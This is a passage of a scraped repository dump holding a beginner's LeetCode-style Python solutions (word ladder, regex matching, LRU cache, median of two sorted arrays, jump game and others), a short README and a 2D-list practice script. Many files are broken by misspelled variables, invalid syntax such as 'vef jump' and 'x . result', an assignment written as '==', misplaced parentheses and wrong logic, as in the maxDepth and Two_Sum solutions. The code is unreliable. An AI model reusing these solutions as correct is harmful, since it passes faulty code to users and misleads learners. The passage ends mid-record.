"/Part4/Word_Ladder_2.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef findLadders(self, beginWord, endWord, wordLists):\n\n\t\tdef bfs(front_level, end_level, is_forward, word_set, path_dic):\n\t\t\tif len(front_level) == 0:\n\t\t\t\treturn False\n\t\t\tif len(front_level) > len(end_level):\n\t\t\t\treturn bfs(end_level, front_level, not is_forward, word_set, path_dic)\n\t\t\tfor word in (front_level | end_level):\n\t\t\t\tword_set.discard(word)\n\t\t\tnext_level = set()\n\t\t\tdone = False\n\t\t\twhile fron_level:\n\t\t\t\tword = fron_level.pop()\n\t\t\t\tfor c in 'abcdefghijklmnopqrstuvwxyz':\n\t\t\t\t\tfor i in range(len(word)):\n\t\t\t\t\t\tnew_word = word[:i] + c + word[i + 1:]\n\t\t\t\t\t\tif next_word in end_level:\n\t\t\t\t\t\t\tdone = True\n\t\t\t\t\t\t\tadd_path(word, new_word, is_forward, path_dic)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tif new_word in word_set:\n\t\t\t\t\t\t\t\tnext_level.add(new_word)\n\t\t\t\t\t\t\t\tadd_path(word, new_word, is_forward, path_dic)\n\t\t\treturn done or bfs(next_level, end_level, is_forward, word_set, path_dic)\n\n\n\t\tdef add_path(word, new_word, is_forward, path_dic):\n\t\t\tif is_forward:\n\t\t\t\tpath_dic[word] = path_dic.get(word, []) + [new_word]\n\t\t\telse:\n\t\t\t\tpath_dic[new_word] = path_dic.get(new_word, []) + [word]\n\n\t\tdef construct_path(word, end_word, path_dic, path, paths):\n\t\t\tif word == end_word:\n\t\t\t\tpaths.append(path)\n\t\t\t\treturn\n\t\t\tif word in path_dic:\n\t\t\t\tfor item in path_dic[word]:\n\t\t\t\t\tconstruct_path(item, end_word, path_dic, path + [item], paths)\n\n\t\tfront_level, end_level = {beginWord}, {endWord}\n\t\tpath_dic = {}\n\t\tbfs(front_level, end_level, True, wordLists, path_dic)\n\t\tpath, paths = [beginWord], []\n\t\tconstruct_path(beginWord, endWord, path_dic, path, paths)\n\t\treturn paths" }, { "alpha_fraction": 0.349940687417984, "alphanum_fraction": 0.3855278789997101, "avg_line_length": 23.05714225769043, "blob_id": "ba935459d0cf5fc7ff427fc66d379ca93d197094", "content_id": 
"ec60dc37063b0ee86ee891fb3db81cd7728e89fa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 843, "license_type": "no_license", "max_line_length": 65, "num_lines": 35, "path": "/Part2/Regular_Expression_Matching.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef isMatch(self, s, p):\n\t\tm = len(s)\n\t\tn = len(p)\n\t\tdp = [[ False for i in range(n + 1)] for i in range(m + 1)]\n\t\tdp[m][n] = True\n\n\t\tfor i in range( n - 1, -1, -1):\n\t\t\tif p[i] == \"*\":\n\t\t\t\tdp[m][i] = dp[m][i + 1]\n\t\t\telif i + 1 < n and p[i + 1] == \"*\":\n\t\t\t\tdp[m][i] = dp[m][i + 1]\n\t\t\telse:\n\t\t\t\tdp[m][i] = False\n\n\t\tfor i in range(m - 1, -1, -1):\n\t\t\tfor j in range(n - 1, -1, -1):\n\t\t\t\tif p[j] == \"*\":\n\t\t\t\t\tif j - 1 >= 0 and p[j - 1] != \"*\":\n\t\t\t\t\t\tdp[i][j] = dp[i][j + 1]\n\t\t\t\t\telse:\n\t\t\t\t\t\treturn False\n\n\t\t\t\telif j + 1 < n and p[j + 1] == \"*\":\n\t\t\t\t\tif s[i] == p[j] or p[j] == \".\":\n\t\t\t\t\t\tdp[i][j] = dp[i][j + 2] or dp[i + 1][j] or dp[i + 1][j + 2]\n\n\t\t\t\t\telse:\n\t\t\t\t\t\tdp[i][j] = dp[i][j + 2]\n\t\t\t\telse:\n\t\t\t\t\tif s[i] == p[j] or p[j] == \".\":\n\t\t\t\t\t\tdp[i][j] = dp[i + 1][j + 1]\n\t\t\t\t\telse:\n\t\t\t\t\t\tdp[i][j] = False\n\t\treturn dp[0][0]\n\n" }, { "alpha_fraction": 0.5838509202003479, "alphanum_fraction": 0.6149068474769592, "avg_line_length": 25.5, "blob_id": "2c06e3a5425aca20f73f1397dec967fd1fd4b354", "content_id": "24e7f3e65b8343037c91b530470f1f0094a608ba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 161, "license_type": "no_license", "max_line_length": 38, "num_lines": 6, "path": "/Part1/Sqrt(x).py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef mysqrt(self, x):\n\t\tresult = 1.0\n\t\twhile abs(result * result - x)> 0.1:\n\t\t\tresult = (result + x . 
result) / 2\n\t\treturn int(result)\n\t\t" }, { "alpha_fraction": 0.6233766078948975, "alphanum_fraction": 0.6406926512718201, "avg_line_length": 18.33333396911621, "blob_id": "31adcf347c557889d2838474df01f4b5f4b40fbb", "content_id": "f5401005b3c28f530299394fe34c97b48f0560d2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 231, "license_type": "no_license", "max_line_length": 33, "num_lines": 12, "path": "/Part3/Jump_Game_2.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class SOlution(object):\n\tvef jump(self, nums):\n\tlength = len(nums)\n\tcounter = 0\n\tlongest = 0\n\treach = 0\n\tfor i in range(length):\n\t\tif longest < i:\n\t\t\tcounter += 1\n\t\t\tlongest = reach\n\t\treach = max(reach, nums[i] + i)\n\treturn counter" }, { "alpha_fraction": 0.6771004796028137, "alphanum_fraction": 0.6853377223014832, "avg_line_length": 36.8125, "blob_id": "f88131305ae95b61f25118338bb0269fb89e6a58", "content_id": "e21ba460fc77eef9fd9885077292621a7588134f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 607, "license_type": "no_license", "max_line_length": 65, "num_lines": 16, "path": "/Part1/Fraction_To_Recurring_Decimal.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef fractionToDecimal(self, numerator, denominator):\n\t\tsign = '-' if numerator * denominator < 0 else ''\n\t\tquotient, remainder = divmod(abs(numerator), abs(denominator))\n\t\tresult_list = [sign, str(quotient), '.']\n\t\tremainders = []\n\t\twhile remainder not in remainders:\n\t\t\tremainders.append(remainder)\n\t\t\tquotient, remainder = divmod(remainder * 10, abs(denominator))\n\t\t\tresult_list.append(str(quotient))\n\n\t\tidx = remainders.index(remainder)\n\t\tresult_list.insert(idx + 3, '(')\n\t\tresult_list.append(')')\n\t\tresult = ''.join(result_list).repalce('(0)'. 
'').rstrip('.')\n\t\treturn result\n\n\t" }, { "alpha_fraction": 0.5650887489318848, "alphanum_fraction": 0.5887573957443237, "avg_line_length": 18.941177368164062, "blob_id": "390b7e621a1a0168e660fe4ba3be0a8b99976122", "content_id": "6104ba2312871105fd0d7398f86497d9a0dafd26", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 338, "license_type": "no_license", "max_line_length": 39, "num_lines": 17, "path": "/Part3/Longest_Substring_Without_Repeated_Characters.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef lengthofLongestSubstring(self, s):\n\t\tif not s:\n\t\t\treturn 0\n\t\tif len(s) <= 1:\n\t\t\treturn len(s)\n\n\t\tlocations - [ -1 for i in range(256)]\n\t\tindex = -1\n\t\tm = 0\n\t\tfor i, v in enumerate(s):\n\t\t\tif (locations[ord(v)] > index):\n\t\t\t\tindex = locations[ord(v)]\n\n\t\t\tm = max(m, i - index)\n\t\t\tlocation[ord(v)] = i\n\t\treturn m" }, { "alpha_fraction": 0.8266666531562805, "alphanum_fraction": 0.8266666531562805, "avg_line_length": 17.75, "blob_id": "259bf446a69e68344ea25b130b7371cc5f198c59", "content_id": "3d5b6f32ac6e7455a7892e1a16a8a7d7ba334f0c", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 75, "license_type": "permissive", "max_line_length": 36, "num_lines": 4, "path": "/Part4/README.md", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "# Personal_Work\nUpdating Coding Part\n\nLeet Code Python challenge solutions\n" }, { "alpha_fraction": 0.6183745861053467, "alphanum_fraction": 0.6325088143348694, "avg_line_length": 20.615385055541992, "blob_id": "6137819b03ce2cfc2a15543c25050a8cae950d42", "content_id": "80101205327fd45e81b08e2ad5f719e8c03a14cc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 283, "license_type": "no_license", "max_line_length": 46, "num_lines": 13, "path": "/Part1/Jump_Game.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef canJump(self, nums):\n\t\tif not nums:\n\t\t\treturn False\n\t\tlength = len(nums)\n\t\tindex = 0\n\t\tlongest = nums[0]\n\t\twhile index <= longest:\n\t\t\tif longest >= length - 1:\n\t\t\t\treturn True\n\t\t\tlongest = max(longest, index + nums[index])\n\t\t\tindex += 1\n\t\treturn False\n\t\t" }, { "alpha_fraction": 0.5231092572212219, "alphanum_fraction": 0.5525209903717041, "avg_line_length": 17.230770111083984, "blob_id": "d359c21ed32711e4d6433545981e3df990ce0aee", "content_id": "f65b6f4516b56689b8868df28232ca08f6b138e7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 476, "license_type": "no_license", "max_line_length": 37, "num_lines": 26, "path": "/Part2/Single_Number_2.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef singleNumber(self, nums):\n\t\tone, two, three = 0, 0, 0\n\t\tfor num in nums:\n\t\t\tthree = two & num\n\t\t\ttwo = two | one & num\n\t\t\tone = one | num\n\n\n\t\t\tone = one & ~three\n\t\t\ttwo = two & ~three\n\n\t\treturn one\n\n\tdef singleNumber_normal(self, nums):\n\t\tresult = 0\n\t\tfor i in range(32):\n\t\t\tcount = 0\n\t\t\tfor num in nums:\n\t\t\t\tcount += (num >> i) & 1\n\t\t\trem = count % 3\n\t\t\tif i == 31 and rem:\n\t\t\t\tresult -= 1 <<31\n\t\t\telse:\n\t\t\t\tresul t |= rem << i\n\t\treturn result\n\t\t" }, { 
"alpha_fraction": 0.5728346705436707, "alphanum_fraction": 0.6299212574958801, "avg_line_length": 24.25, "blob_id": "fb80c698d300de82c64b394f32deeaf25ffe5e8a", "content_id": "242135f2234682561db06676f050976285217063", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 508, "license_type": "no_license", "max_line_length": 156, "num_lines": 20, "path": "/Part2/Scramble_String.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "from collections import defaultdict\n\nclass Solution(object):\n\tdef isScramble(self, s1, s2):\n\t\tif s1 == s2:\n\t\t\treturn True\n\n\t\tcount1 = defaultdict(int)\n\t\tcount2 = defaultdict(int)\n\n\t\tfor e1, e2 in zip(s1, s2):\n\t\t\tcount1[e1] += 1\n\t\t\tcount2[e2] += 1\n\t\tif count1 != count2:\n\t\t\treturn False\n\n\t\tfor i in range(1, len(s1)):\n\t\t\tif self.isScramble(s1[:i], s2[:i]) and self.isScramble(s1[i:], s2[i:]) or self.isScramble(s1[:i], s2[-i:]) and self.isScramble(s1[i:], s2[:len(s2) - i]):\n\t\t\t\treturn True\n\t\treturn False\n\n\t\t" }, { "alpha_fraction": 0.6112852692604065, "alphanum_fraction": 0.6363636255264282, "avg_line_length": 30.299999237060547, "blob_id": "1659ca716a0c988055150b6c3c9984bbe236c0c7", "content_id": "78d20ae5cddcc4c4427f4b16c75bdf155998dbe4", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 319, "license_type": "permissive", "max_line_length": 39, "num_lines": 10, "path": "/Part4/Two_Sum.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef twoSum(self, nums, target):\n\t\thash_map = {}\n\t\tfor index, value in enumerate(nums):\n\t\t\thash_map[value] = index\n\t\tfor index1, value in enumerate(nums):\n\t\t\tif target - value in hash_map:\n\t\t\t\tindex2 = hash_map[target - value]\n\t\t\t\tif index1 != index2:\n\t\t\t\t\treturn [index1 + 1, index2 + 1]\n\n\t\t\t\t\t" }, { "alpha_fraction": 0.6524559855461121, "alphanum_fraction": 0.6598702669143677, "avg_line_length": 21.93617057800293, "blob_id": "333168fbadf1740ee4e3e714f313f2838fd4e3a9", "content_id": "28e33a241fb005f090f6bb9f732c5e41ee73c1a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1079, "license_type": "no_license", "max_line_length": 60, "num_lines": 47, "path": "/Part2/LRU_Cache.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Node(object):\n\tdef __init__(self, key, value):\n\t\tself.key = key\n\t\tself.val = value\n\t\tself.prev, self.next = None, None\n\ndef __init__(self, capacity):\n\tself.capacity, self.size = capacity, 0\n\tself.dic = {}\n\tself.head, self.tail = self.Node(-1, -1), self.Node(-1, -1)\n\tself.head.next, self.tail.prev = self.tail, self.head\n\ndef _remove(self, node):\n\tnode.prev.next = node.next\n\tnode.next.prev = node.prev\n\tnode.prev, node.next = None, None\n\ndef _insert(selfm node):\n\tnode.prev, node.next = self.head, self.head.next\n\tself.head.next.prev = node\n\tself.head.next = node\n\ndef get(self, key):\n\tif key not in self.dic:\n\t\treturn -1\n\tnode = self.dic[key]\n\tself._remove(node)\n\tself._insert(node)\n\treturn node.value\n\ndef put(self, key, value):\n\tif key in self.dic:\n\t\tnode = self.dic[key]\n\t\tself._remove(node)\n\t\tnode.value = value\n\t\tself._insert(node)\n\n\telse:\n\t\tif self.size == self.capacity:\n\t\t\tdiscard = self.tail.prev\n\t\t\tself._remove(discard)\n\t\t\tdel 
self.dic[discard.key]\n\t\t\tself.size -= 1\n\t\tnode = self.Node(key, value)\n\t\tself.dic[key] = node\n\t\tself._insert(node)\n\t\tself.size += 1\n\n" }, { "alpha_fraction": 0.5603053569793701, "alphanum_fraction": 0.5938931107521057, "avg_line_length": 20.866666793823242, "blob_id": "200c07efae1417e6c001d2d7adbd2d6e8a4177de", "content_id": "6aa823313f37dd982dfae3191ba89175448b371e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 655, "license_type": "no_license", "max_line_length": 77, "num_lines": 30, "path": "/Part2/Minimum_Window.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "from collections import defaultdict\n\nclass Solution(object):\n\tdef minWindow(self, s, t):\n\t\tMAX_INT = 2147483647\n\t\tstart = end = 0\n\t\tchar_need = defaultdict(int)\n\n\t\tcount_need = len(t)\n\t\tmin_length = MAX_INT\n\t\tmin_start = 0\n\n\t\tfor i in t:\n\t\t\tchar_need[i] += 1\n\n\t\twhile end < len(s):\n\t\t\tif char_need[s[end]] > 0:\n\t\t\t\tcount_need -= 1\n\t\t\tchar_need[s[end]] -= 1\n\t\t\tend += 1\n\t\t\twhile count_need == 0:\n\t\t\t\tif min_length > end - start:\n\t\t\t\t\tmin_length = end -start\n\t\t\t\t\tmin_start = start\n\t\t\t\tchar_need[s[start]] += 1\n\n\t\t\t\tif char_need[s[start]] > 0:\n\t\t\t\t\tcount_need += 1\n\t\t\t\tstart += 1\n\t\treturn \"\" if min_length == MAX_INT else s[min_start:min_start + min_length]" }, { "alpha_fraction": 0.5916442275047302, "alphanum_fraction": 0.6010781526565552, "avg_line_length": 36, "blob_id": "8f5d160a04f86d6470b961679a23937d5dfa0e61", "content_id": "c9d4af81fba8bd8958b901208a6e6ef4a9b33a23", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 742, "license_type": "no_license", "max_line_length": 102, "num_lines": 20, "path": "/Part1/Text_Justification.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef fullJustify(self, words, maxWidth):\n\t\tstart = end = 0\n\t\tresult, curr_words_length = [], 0\n\t\tfor i, word in enumerate(words):\n\t\t\tif len(word) + curr_words_length + end - start > maxWidth:\n\t\t\t\tif end - start == 1:\n\t\t\t\t\tresult.append(words[start] + ' ' * (maxWidth - curr_words_length))\n\n\t\t\t\telse:\n\t\t\t\t\ttotal_space = maxWidth - curr_words_length\n\t\t\t\t\tspace, extra = divmod(total_space, end - start - 1)\n\t\t\t\t\tfor j in range(extra):\n\t\t\t\t\t\twords[start + j] += ' '\n\t\t\t\t\tresult.append((' ' * space).join(words[start: end]))\n\t\t\t\tcurr_words_length = 0\n\t\t\t\tstart = end = i\n\t\t\tend += 1\n\t\t\tcurr_words_length += len(word)\n\t\tresult.append(' '.join(words[start:end]) + ' ' * (maxWidth - curr_words_length - (end - start - 1)))\n\t\t" }, { "alpha_fraction": 0.6153846383094788, "alphanum_fraction": 0.6153846383094788, "avg_line_length": 22.076923370361328, "blob_id": "f2b39cb66e53d8328f49b7060cef6689dcfc52f1", "content_id": "4adf3cd88697c3da3f151c3165fbcd70a06322c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 299, "license_type": "no_license", "max_line_length": 31, "num_lines": 13, "path": "/Part3/Group_Anagrams.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef groupAnagrams(self, strs):\n\t\tmaps = {}\n\t\tfor i, v in enumerate(strs):\n\t\t\ttarget = \"\".join(sorted(v))\n\t\t\tif target not in map:\n\t\t\t\tmap[target] = 
[v]\n\t\t\telse:\n\t\t\t\tmap[target].append(v)\n\t\tresult = []\n\t\tfor value in map.values():\n\t\t\tresult += [sorted(value)]\n\t\treturn result" }, { "alpha_fraction": 0.5127636194229126, "alphanum_fraction": 0.5937846899032593, "avg_line_length": 29.066667556762695, "blob_id": "305dfc183eb2fbaee9f85164192b901ae251a96c", "content_id": "37db9ce3e6dd109e2a75efd6aca3711f672538e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 901, "license_type": "no_license", "max_line_length": 77, "num_lines": 30, "path": "/Part2/Median_Of_Two_Sorted_Arrays.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef findMedianSortedArrays(self, nums1, nums2):\n\t\tlength1 = len(nums1)\n\t\tlenght2 = len(nums2)\n\t\tk = (length1 + lenght2) // 2\n\t\tif (length1 + length2) % 2 == 0:\n\t\t\treturn (self.findK(nums1, nums2, k) + self.findK(nums1, nums2, k - 1)) / 2\n\t\telse:\n\t\t\treturn self.findK(nums1, nums2, k)\n\n\tdef findK(self, num1, num2, k):\n\t\tif not num1:\n\t\t\treturn num2[k]\n\t\tif not num2:\n\t\t\treturn num1[k]\n\t\tif k == 0:\n\t\t\treturn min(num1[0], num2[0])\n\n\t\tlength1 = len(num1)\n\t\tlength2 = len(num2)\n\t\tif num1[length1 // 2] > num2[lenght2 // 2]:\n\t\t\tif k > length1 //3 + length2 // 2:\n\t\t\t\treturn self.findK(num1, num2[length2 // 2 + 1:], k - length2 // 2 - 1)\n\t\t\telse:\n\t\t\t\treturn self.findK(num1[:length // 2], num2, k)\n\t\telse:\n\t\t\tif k > length1 // 2 + length2 // 2 :\n\t\t\t\treturn self.findK(num1[length1 // 2 + 1:], num2, k - length1 // 2 - 1)\n\t\t\telse:\n\t\t\t\treturn self.findK(num1, num2[:length2 // 2], k)" }, { "alpha_fraction": 0.6679999828338623, "alphanum_fraction": 0.6759999990463257, "avg_line_length": 21.81818199157715, "blob_id": "6a8c2fddfa073c9baac26c58bfadd17705a1304d", "content_id": "6e0a21ad8c2ecf8d1973adf4fe1e23d907985533", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 250, "license_type": "no_license", "max_line_length": 69, "num_lines": 11, "path": "/Part3/Maximum_Depth_OF_Binary_Tree.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class TreeNode(object):\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.left = None\n\t\tself.right = None\n\nclass Solution(object):\n\tdef maxDepth(self, root):\n\t\tif not root:\n\t\t\treturn 0\n\t\treturn max(self.maxDepth(root.left), self.maxDepth(root.right) + 1)" }, { "alpha_fraction": 0.5019454956054688, "alphanum_fraction": 0.5252918004989624, "avg_line_length": 20.08333396911621, "blob_id": "305fd13e1c23f18419b8868639ae04aa62dfe7b1", "content_id": "cd194c4eee6299ce5f520c68f6aec4859a5ab028", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 257, "license_type": "no_license", "max_line_length": 40, "num_lines": 12, "path": "/Part1/Word_Break.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef wordBreak(self, s, wordDict):\n\t\tn = len(s)\n\t\tdp = [False] * (n + 1)\n\t\tdp[0] = True\n\n\t\tfor i in range(n):\n\t\t\tfor j in range(i, -1, -1):\n\t\t\t\tif dp[j] and s[j:i + 1] in wordDict:\n\t\t\t\t\tdp[i + 1] = True\n\t\t\t\t\tbreak\n\t\treturn dp[n]\n\n\n\t\t" }, { "alpha_fraction": 0.5588235259056091, "alphanum_fraction": 0.5794117450714111, "avg_line_length": 23.14285659790039, "blob_id": "0ee35d8b3dfd5dec012a2cd759009ba71bf580b1", "content_id": 
"91963e2712e7532640be6d9381175bee86c438e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 340, "license_type": "no_license", "max_line_length": 46, "num_lines": 14, "path": "/Part1/Remove_Element.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef removeElement(self, nums, val):\n\t\tleft = 0\n\t\tright = len(nums) - 1\n\t\twhile left <= right:\n\t\t\twhile left <= right and nums[left] != val:\n\t\t\t\tleft += 1\n\t\t\twhile left <= right and nums[right] == val:\n\t\t\t\tright -= 1\n\t\t\tif left < right:\n\t\t\t\tnums[left] = nums[right]\n\t\t\t\tleft += 1\n\t\t\t\tright -= 1\n\t\treturn right + 1\n\t\t" }, { "alpha_fraction": 0.5787171721458435, "alphanum_fraction": 0.5874635577201843, "avg_line_length": 28.869565963745117, "blob_id": "7a2213d9623792c9963cdf6ed9188f25f6451901", "content_id": "6d9d4dc1fafca059ddbc6b8b729e113f280fc986", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 686, "license_type": "no_license", "max_line_length": 84, "num_lines": 23, "path": "/Part2/4Sum.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef fourSum(self, nums, target):\n\t\tif len(nums) < 4:\n\t\t\treturn []\n\t\tresult = set()\n\t\tsumsIndexs = {}\n\n\t\tfor i in range(len(nums)):\n\t\t\tfor j in range(i + 1, len(nums)):\n\t\t\t\tif nums[i] + nums[j] in sumsIndexs:\n\t\t\t\t\tsumsIndexs[nums[i] + nums[j]]. append((i, j))\n\t\t\t\telse:\n\t\t\t\t\tsumsIndexs[nums[i] + nums[j]] == [(i, j)]\n\n\t\tfor i in range(len(nums)):\n\t\t\tfor j in range(i + 1, len(nums)):\n\t\t\t\tsumNeeded = target - (nums[i] + nums[j])\n\t\t\t\tif sumNeeded in sumsIndexs:\n\t\t\t\t\tfor index in sumsIndexs[sumNeeded]:\n\t\t\t\t\t\tif index[0] > j:\n\t\t\t\t\t\t\tresult.add(tuple(sorted([nums[i], nums[j], nums[index[0]], nums[index[1]]])))\n\t\tresult = [list(l) for l in result]\n\t\treturn result" }, { "alpha_fraction": 0.5966851115226746, "alphanum_fraction": 0.5966851115226746, "avg_line_length": 16.14285659790039, "blob_id": "c47454e4e3edb46cd158d3b0c1efb9b9ac398c5b", "content_id": "838d586e7bdafd2406e6c7fd7108fd44312ef0b1", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 362, "license_type": "permissive", "max_line_length": 36, "num_lines": 21, "path": "/Part4/Binary_tree_inorder_traversal.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class TreeNode(object):\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.left = None\n\t\tself.right = None\n\nclass Solution(object):\n\tdef inOrderTransversal(self, root):\n\t\tresult = []\n\t\tstack = []\n\t\tp = root\n\n\t\twhile p or stack:\n\t\t\twhile p:\n\t\t\t\tstack.append(p)\n\t\t\t\tp = p.left\n\t\t\tif stack:\n\t\t\t\tp = stack.pop()\n\t\t\t\tresult.append(p.val)\n\t\t\t\tp = p.right\n\t\treturn result\n\t\t" }, { "alpha_fraction": 0.637155294418335, "alphanum_fraction": 0.6473149657249451, "avg_line_length": 20.40625, "blob_id": "f04375b83a03dc8ee0492660ddc4e7b64981dfac", "content_id": "ad81d594fc8a4248cd74a8fc1b5221d54124a378", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 689, "license_type": "permissive", "max_line_length": 52, "num_lines": 32, "path": "/Part4/Convert_Sorted_List_To_Binary_Search_Tree.py", "repo_name": "SreecharanG/Personal_Work", 
"src_encoding": "UTF-8", "text": "class ListNode(object):\n\tdef __init__(self, x):\n\t\tself.val = x\n\t\tself.next = None\n\nclass TreeNode(object):\n\tdef __init_-(self, x):\n\t\tself.val = x\n\t\tself.left = None\n\t\tself.right = None\n\nclass Solution(object):\n\t\n\tdef sortedListToBST(self, head):\n\t\tnode, length = head, 0\n\t\twhile node:\n\t\t\tnode = node.next\n\t\t\tlength += 1\n\t\tself.curr = head\n\t\treturn self._sortedListToBST(0, length - 1)\n\n\tdef _sortedListToBST(self, left, right):\n\t\tif left > right:\n\t\t\treturn None\n\n\t\tmid = (left + right) // 2\n\t\tleft = self._sortedListToBST(left, mid - 1)\n\t\troot = TreeNode(self.curr.val)\n\t\troot.left = left\n\t\tself.curr = self.curr.next\n\t\troot.right = self._sortedListToBST(mid + 1, right)\n\t\treturn root\n\t\t\n\n" }, { "alpha_fraction": 0.4795081913471222, "alphanum_fraction": 0.506147563457489, "avg_line_length": 20.130434036254883, "blob_id": "bdd568a58972e537649739ea9cabdc98a2d20f3f", "content_id": "6a2efa202d689b7fa98c9be90005ec72f779b3ff", "detected_licenses": [ "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 488, "license_type": "permissive", "max_line_length": 37, "num_lines": 23, "path": "/Part4/Zig_Zag_Conversion.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "class Solution(object):\n\tdef convert(self, s, numRows):\n\t\tif numRows <= 1:\n\t\t\treturn s\n\t\tresult = ''\n\t\tindex = 0\n\t\tn = len(s)\n\t\tfor i in range(0, numRows):\n\t\t\tif i == 0 or i == numRows - 1:\n\t\t\t\twhile index < n:\n\t\t\t\t\tresult += s[index]\n\t\t\t\t\tindex += 2 * numRows - 2\n\t\t\t\tindex = i + 1\n\t\t\telse:\n\t\t\t\twhile index < n :\n\t\t\t\t\tresult += s[index]\n\t\t\t\t\tindex += 2 * numRows - 2 * i - 2\n\t\t\t\t\tif index >= n:\n\t\t\t\t\t\tbreak\n\t\t\t\t\tresult += s[index]\n\t\t\t\t\tindex += 2 * i\n\t\t\t\tindex = i + 1\n\t\treturn result\n\t\t" }, { "alpha_fraction": 0.5761396884918213, "alphanum_fraction": 0.6314257979393005, "avg_line_length": 18.433961868286133, "blob_id": "87c6e2b4af8a4507ab52b9ad844fadce26389969", "content_id": "947130919fc6586cd807d99077114d83cf60f3d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1031, "license_type": "no_license", "max_line_length": 86, "num_lines": 53, "path": "/Part3/Iteration.py", "repo_name": "SreecharanG/Personal_Work", "src_encoding": "UTF-8", "text": "# Printing all the numbers\n\na_2d = [[1,2,3],[5,6,7]]\nprint (a_2d)\n\n# To replace the element\n\nb_2d = [[1,2,3],[5,6,7]]\nb_2d[1][1] = 99\nprint (b_2d)\n\n#Iterate Over c_2d And Print all the syntax\n\nc_2d = [[1,2,3],[5,6,7]]\nfor i in c_2d:\n\tfor item in i:\n\t\tprint(item)\n\n#Print all the numbers using range of\nd_2d = [[1,2,3],[5,6,7]]\nfor i in range(d_2d):\n\tfor j in range(d_2d[i]):\n\t\tprint(d_2d[i][j])\n\n#Adding the numbers in diagnoal\ndef diagnoal_sum():\n\tgiven2_d = [[1,2,3],[4,5,6],[7,8,9]]\n\ttotal = 0\n\tfor i in range (len(given2_d):\n\t\ttotal += given2_d[i][i]\n\treturn (total)\n\n\n#Sample Interview Question\n#Chess Board any of the rookies can able to attack any one horizantally and Vertically\ndef rook_safe(chessboard):\n\tn = len(chessboard)\n\t\n\tfor row_i in range(n):\n\t\trow_count =0\n\t\tfor col_i in range(n):\n\t\t\trow_count +=chessboard[row_i][col_i]\n\t\tif row_count > 1:\n\t\t\treturn False\n\n\tfor col_i in range(n):\n\t\tcol_count =0\n\t\tfor col_i in range(n):\n\t\t\tcol_count +=chessboard[row_i][col_i]\n\t\tif 
